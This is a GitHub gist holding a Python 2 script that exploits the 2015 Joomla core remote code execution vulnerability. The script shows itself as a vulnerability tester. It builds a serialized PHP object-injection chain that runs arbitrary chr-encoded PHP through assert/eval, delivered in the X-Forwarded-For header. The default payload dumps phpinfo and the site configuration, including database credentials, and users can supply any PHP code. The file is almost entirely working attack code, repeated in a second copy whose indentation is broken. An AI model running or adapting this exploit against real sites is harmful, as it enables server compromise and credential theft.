stevenrombauts/exploit-joomla.py

## exploit-joomla.py
#!/usr/bin/env python
##
# This scripts tests a given website for the 20151201 Remote Code Execution Vulnerability ( https://developer.joomla.org/security-centre/630-20151214-core-remote-code-execution-vulnerability.html)
#
# Instructions:
#  - Download this gist: wget https://gist.githubusercontent.com/stevenrombauts/553584e7ab2ef4a832f2/raw/a140c7f5c1bcdc44e71dbfb07da76e418379ba8e/exploit-joomla.py
#  - Make executable: chmod +x exploit-joomla.py
#  - Run: ./exploit-joomla.py http://yoursite.com/
##
import requests
import sys
import uuid
import md5

def main(argv):
    try:
        target = argv[1]
    except IndexError:
        usage()

    try:
        payload = argv[2]
    except IndexError:
        payload = "phpinfo(); print_r(JFactory::getConfig());"

    print "Testing {0} with payload \"{1}\" ..".format(target, payload)

    identifier = uuid.uuid4()
    payload   += "echo '{0}';".format(identifier)

    pl = generate_payload(payload)
    response = exploit(target, pl)

    text_file = open("/tmp/result.html", "w")
    text_file.write(response.text.encode('utf-8'))
    text_file.close()

    print "Response stored in /tmp/result.html"

    if str(identifier) in response.text:
        print "{0} is \033[91mvulnerable\033[0m: PHP payload was injected and executed!".format(target)
    else:
        print "{0} is \033[92msafe\033[0m from code injection.".format(target)

def usage():
    print "Usage: ./script <URL to scan> [PHP payload]"
    sys.exit(0)

def exploit(url, user_agent):
    headers = {
        'X-Forwarded-For': user_agent
    }
    cookies  = requests.get(url,headers=headers).cookies
    response = requests.get(url, headers=headers,cookies=cookies)

    return response

def php_to_chr(data):
    encoded = ""
    for char in data:
        encoded += "chr({0}).".format(ord(char))

    return encoded[:-1]

def generate_payload(php_payload):
    php_code = "eval({0})".format(php_to_chr(php_payload))

    injected_payload = "{};JFactory::getConfig();exit".format(php_code)

    exploit = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";'''
    exploit += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload)
    exploit += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}'''
    exploit += '\xf0\xfd\xfd\xfd'

    return exploit

if __name__ == '__main__':
    main(sys.argv)
	#!/usr/bin/env python
	##
	# This scripts tests a given website for the 20151201 Remote Code Execution Vulnerability ( https://developer.joomla.org/security-centre/630-20151214-core-remote-code-execution-vulnerability.html)
	#
	# Instructions:
	# - Download this gist: wget https://gist.githubusercontent.com/stevenrombauts/553584e7ab2ef4a832f2/raw/a140c7f5c1bcdc44e71dbfb07da76e418379ba8e/exploit-joomla.py
	# - Make executable: chmod +x exploit-joomla.py
	# - Run: ./exploit-joomla.py http://yoursite.com/
	##
	import requests
	import sys
	import uuid
	import md5

	def main(argv):
	try:
	target = argv[1]
	except IndexError:
	usage()

	try:
	payload = argv[2]
	except IndexError:
	payload = "phpinfo(); print_r(JFactory::getConfig());"

	print "Testing {0} with payload \"{1}\" ..".format(target, payload)

	identifier = uuid.uuid4()
	payload += "echo '{0}';".format(identifier)

	pl = generate_payload(payload)
	response = exploit(target, pl)

	text_file = open("/tmp/result.html", "w")
	text_file.write(response.text.encode('utf-8'))
	text_file.close()

	print "Response stored in /tmp/result.html"

	if str(identifier) in response.text:
	print "{0} is \033[91mvulnerable\033[0m: PHP payload was injected and executed!".format(target)
	else:
	print "{0} is \033[92msafe\033[0m from code injection.".format(target)

	def usage():
	print "Usage: ./script <URL to scan> [PHP payload]"
	sys.exit(0)

	def exploit(url, user_agent):
	headers = {
	'X-Forwarded-For': user_agent
	}
	cookies = requests.get(url,headers=headers).cookies
	response = requests.get(url, headers=headers,cookies=cookies)

	return response

	def php_to_chr(data):
	encoded = ""
	for char in data:
	encoded += "chr({0}).".format(ord(char))

	return encoded[:-1]

	def generate_payload(php_payload):
	php_code = "eval({0})".format(php_to_chr(php_payload))

	injected_payload = "{};JFactory::getConfig();exit".format(php_code)

	exploit = r'''}__test\|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";'''
	exploit += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload)
	exploit += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}'''
	exploit += '\xf0\xfd\xfd\xfd'

	return exploit

	if __name__ == '__main__':
	main(sys.argv)